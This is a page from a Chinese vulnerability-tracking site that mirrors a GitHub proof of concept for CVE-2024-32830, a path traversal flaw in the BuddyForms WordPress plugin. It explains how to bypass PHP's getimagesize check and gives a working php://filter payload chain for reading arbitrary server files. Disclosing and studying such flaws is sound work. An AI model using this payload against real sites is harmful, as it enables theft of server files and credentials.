漏洞平台

POC详情： 3e06193edf45277bc164a9c7afd073c970c99e30

来源

https://github.com/ptrstr/CVE-2024-32830-poc

关联漏洞

标题： WordPress plugin BuddyForms 路径遍历漏洞 (CVE-2024-32830)
描述：WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin BuddyForms 2.8.8 版本及之前版本存在路径遍历漏洞，该漏洞源于存在路径遍历漏洞。

描述

PoC code to download files with CVE-2024-32830

介绍

# CVE-2024-32830-poc
PoC code to download files with CVE-2024-32830

## `getimagesize` bypass

To bypass the `getimagesize` restriction, we can create a simple `image/vnd.wap.wbmp` image for PHP.

The check for the filetype is very simple:
```c
// https://github.com/php/php-src/blob/0029d2b08bbd3cb3aa293d9c8d55bf31faa9e203/ext/standard/image.c#L917
static int php_get_wbmp(php_stream *stream, struct gfxinfo **result, int check)
{
	int i, width = 0, height = 0;

	if (php_stream_rewind(stream)) {
		return 0;
	}

	/* get type */
	if (php_stream_getc(stream) != 0) {
		return 0;
	}

	/* skip header */
	do {
		i = php_stream_getc(stream);
		if (i < 0) {
			return 0;
		}
	} while (i & 0x80);

	/* get width */
	do {
		i = php_stream_getc(stream);
		if (i < 0) {
			return 0;
		}
		width = (width << 7) | (i & 0x7f);
		/* maximum valid width for wbmp (although 127 may be a more accurate one) */
		if (width > 2048) {
			return 0;
		}
	} while (i & 0x80);

	/* get height */
	do {
		i = php_stream_getc(stream);
		if (i < 0) {
			return 0;
		}
		height = (height << 7) | (i & 0x7f);
		/* maximum valid height for wbmp (although 127 may be a more accurate one) */
		if (height > 2048) {
			return 0;
		}
	} while (i & 0x80);

	if (!height || !width) {
		return 0;
	}

	if (!check) {
		(*result)->width = width;
		(*result)->height = height;
	}

	return IMAGE_FILETYPE_WBMP;
}
```

The simplest way to construct a valid image would be with two NUL bytes, followed by two `< 0x80` bytes for the width and height.

It's possible to do this for any file, using `php://filter`.

The first layer would need to apply a base64 encoding to ensure that all the data is ASCII, thus satisfying the `< 0x80` constraint.

The second filter would need to add the first two NUL bytes. This is possible by forcing a conversion from UTF-16BE to UTF-32BE. This will force iconv to interpret each chunk of two bytes as a valid UTF-16BE character, and then prepend two NUL bytes before it to make it UTF-32BE. The actual filter to use is: `convert.iconv.utf-16be.utf-32be`.

Our final payload is `php://filter/convert.base64-encode/convert.iconv.utf-16be.utf-32be/resource=<file here>`.

文件快照


 [4.0K]  /data/pocs/3e06193edf45277bc164a9c7afd073c970c99e30
├── [1.0K]  LICENSE
├── [1.1K]  poc.py
└── [2.1K]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。